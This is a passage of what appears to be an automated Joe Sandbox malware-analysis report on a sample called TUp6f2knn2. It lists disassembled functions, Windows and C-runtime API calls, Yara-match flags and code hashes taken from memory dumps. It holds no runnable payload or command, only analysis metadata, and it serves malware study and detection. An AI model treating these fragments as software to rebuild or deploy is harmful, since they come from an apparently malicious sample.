Part of subcall function 02531370: __Mtx_unlock.LIBCPMT ref: 02531377

std::_Cnd_initX.LIBCPMT ref: 0254C72F

Part of subcall function 0254C3EF: __Cnd_broadcast.LIBCPMT ref: 0254C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0254C73D

Strings

t#D, xrefs: 0254C6C2

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: f722c28417174cbae0241cec2f55c664ca6dfb01a912224796b4ef2620ba7569
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 5C01F271901606ABCB11B7B0CD84B9DF76ABF80318F144012E90497280EF78EA118F9A

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 02561129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

_free.LIBCMT ref: 02561444
_free.LIBCMT ref: 0256145D
_free.LIBCMT ref: 0256148F
_free.LIBCMT ref: 02561498
_free.LIBCMT ref: 025614A4

Strings

C, xrefs: 02561291

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: e455ec4fd8974a25f7a0c284c3aefb1d58464304817239ad8b8dba1188ceeb1f
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 7EB12975A0161A9FDB24DF18C888BBDB7B5FB48304F1485AAD80DA7350D730AE90CF48

Function 0256A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0256A184
_free.LIBCMT ref: 0256A192
_free.LIBCMT ref: 0256A2C0
_free.LIBCMT ref: 0256A2CB

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 7d4b6fb63218a824fa68f59cdb5897e6549ab3ffd3a633e4a56f1eac97dd7ee2
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 4161C071940206AFDB20DFA8C845BBABBF5FF85710F2441AAE944FB341E7719941CB58

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 02563AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0255C4A4,E0830C40,?,?,?,?,?,?,0256425F,0253E03C,0255C4A4,?,0255C4A4,0255C4A4,0253E03C), ref: 02563B2C
__fassign.LIBCMT ref: 02563BA7
__fassign.LIBCMT ref: 02563BC2
WideCharToMultiByte.KERNEL32(?,00000000,0255C4A4,00000001,?,00000005,00000000,00000000), ref: 02563BE8
WriteFile.KERNEL32(?,?,00000000,0256425F,00000000,?,?,?,?,?,?,?,?,?,0256425F,0253E03C), ref: 02563C07
WriteFile.KERNEL32(?,0253E03C,00000001,0256425F,00000000,?,?,?,?,?,?,?,?,?,0256425F,0253E03C), ref: 02563C40

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: c1024901cf23c024cfe7e7ebeb55af0ed2af4235643388b28d6d08d8e7aba378
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: B051D574900209AFDB10CFA8D888BEEBBF5FF49704F14416AE555E7291E7309A81CF68

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 02554AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02554ACD

Part of subcall function 02554D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02554800), ref: 02554DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02554AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02554AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02554AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02554B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02554BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02554BC3

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 9709ba7cee76539f326d50ca35014af16133e5bbba163c8af2d68a8e891385f8
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: F531E835A002259BCF05EF64C8A1B6DB7BAFF84320F204566ED15AB245DB70EE41CB98

Function 0256FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 5816d1a1998597f4237a9f3858e8886b252d7eff202919b55b795116e0926450
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 7811A531908126BBEB212F75DC5C97B7A5EFFC5B617100A15FC16C7250DB308940CAA8

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0256A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0256A331: _free.LIBCMT ref: 0256A35A

_free.LIBCMT ref: 0256A638

Part of subcall function 025636D1: HeapFree.KERNEL32(00000000,00000000,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?), ref: 025636E7
Part of subcall function 025636D1: GetLastError.KERNEL32(?,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?,?), ref: 025636F9

_free.LIBCMT ref: 0256A643
_free.LIBCMT ref: 0256A64E
_free.LIBCMT ref: 0256A6A2
_free.LIBCMT ref: 0256A6AD
_free.LIBCMT ref: 0256A6B8
_free.LIBCMT ref: 0256A6C3

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 84bbc9262edeb7e38c7f7dbf0245dd44d7d7e9890645f276df4d27e733635b5e
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: D3117F31654B85BADE20B7B1CC4DFEB779EFF80700F440824A299BB150DA64B5144F68

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 02542659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02542667
GetLastError.KERNEL32 ref: 0254266D
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0254269A
GetLastError.KERNEL32 ref: 025426A4
GetLastError.KERNEL32 ref: 025426B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025426CC
__CxxThrowException@8.LIBVCRUNTIME ref: 025426DA

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 28365cb2f832ab677f41686cac36a6c718919a11bae6d928b14ba63c943adf82
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: B401A735501135A7D720BF65EC48FAFBB78BF82B56F500925FC09D2060DF24D9048AAC

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
GetLastError.KERNEL32 ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
GetLastError.KERNEL32 ref: 0041243D
GetLastError.KERNEL32 ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 025424A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0254670B), ref: 025424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0254670B), ref: 02542500
GetProcAddress.KERNEL32(00000000), ref: 02542507
GetLastError.KERNEL32(?,?,?,0254670B), ref: 02542522
GetLastError.KERNEL32(?,?,?,0254670B), ref: 0254252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02542544
__CxxThrowException@8.LIBVCRUNTIME ref: 02542552

Strings

kernel32.dll, xrefs: 025424B0, 025424B5, 025424FA

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 4ceb8dd415767e93dd1e8ad5a9952c47cfa6bfdd72eda41fc31e36a25e491d1f
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 92F0D6759003203FB7113B75BC4985B7FACED46A26720062AFC01E2191EF748941896C

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

F(@, xrefs: 0040C651
ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C61B
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::eofbit set, xrefs: 0040C649

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0256239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,025625EC,00000001,00000001,?), ref: 025623F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,025625EC,00000001,00000001,?,?,?,?), ref: 0256247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02562575
__freea.LIBCMT ref: 02562582

Part of subcall function 0256390E: RtlAllocateHeap.NTDLL(00000000,0253DAD7,00000000), ref: 02563940

__freea.LIBCMT ref: 0256258B
__freea.LIBCMT ref: 025625B0

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: ca0f0d82d8cf1081683a7ca48ec107df0c29b689211751a62e162d4581f2c029
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: AF51D172A00217ABDB358F64CC68EBE7BAAFB94754F154628FC04DB190EB74DC40CA58

Function 0255E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0255E445
__cftoe.LIBCMT ref: 0255E477

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: d4cb2106474889e2097c407bc7c2ce3340d76ac7f5536aaf2e79260b5b456dab
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 0451FE32900215EBDF249F58CC56B7E7BAABF49374F14425BFC15D6181EB31DA008A6C

Function 0255302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02553051

Part of subcall function 02548AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02548ABD

SafeSQueue.LIBCONCRT ref: 0255306A
Concurrency::location::_Assign.LIBCMT ref: 0255312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0255314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02553159

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: 084a5a62fcac105acbe6a6fffb209d24cac4a0e8e09ea953b5789b2afde092c5
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: CC31D331A00622AFCB25EF74C854A7ABBB1FF84754F14459ADC0A8B251DB70E945CBC8

Function 02535437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0253544B
__Mtx_init.LIBCPMT ref: 02535471
std::_Cnd_initX.LIBCPMT ref: 02535494
__Thrd_start.LIBCPMT ref: 025354B9
std::_Cnd_waitX.LIBCPMT ref: 025354D9
std::_Cnd_initX.LIBCPMT ref: 02535506

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 3638bdbc49498361c142116952e4f3e33d5cf99db1208d7bfa177527fd449819
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: E5219471C0520AAADF17EBB4D840BDDBBF9BF48325F54A019E004B7140EB7599448B79

Function 02559041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02559038,025569C9,02570907,00000008,02570C6C,?,?,?,?,02553CB2,?,?,0045A064), ref: 0255904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0255905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02559076
SetLastError.KERNEL32(00000000,?,02559038,025569C9,02570907,00000008,02570C6C,?,?,?,?,02553CB2,?,?,0045A064), ref: 025590C8

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 86199765bc4f574d1dd0a9c0099c87a0ce76824528b288fa6c5341e1843c4633
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: B001D832209732EEA62427B4ACA997A2B45FF45775B30073BED20452F0EF16881149DD

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

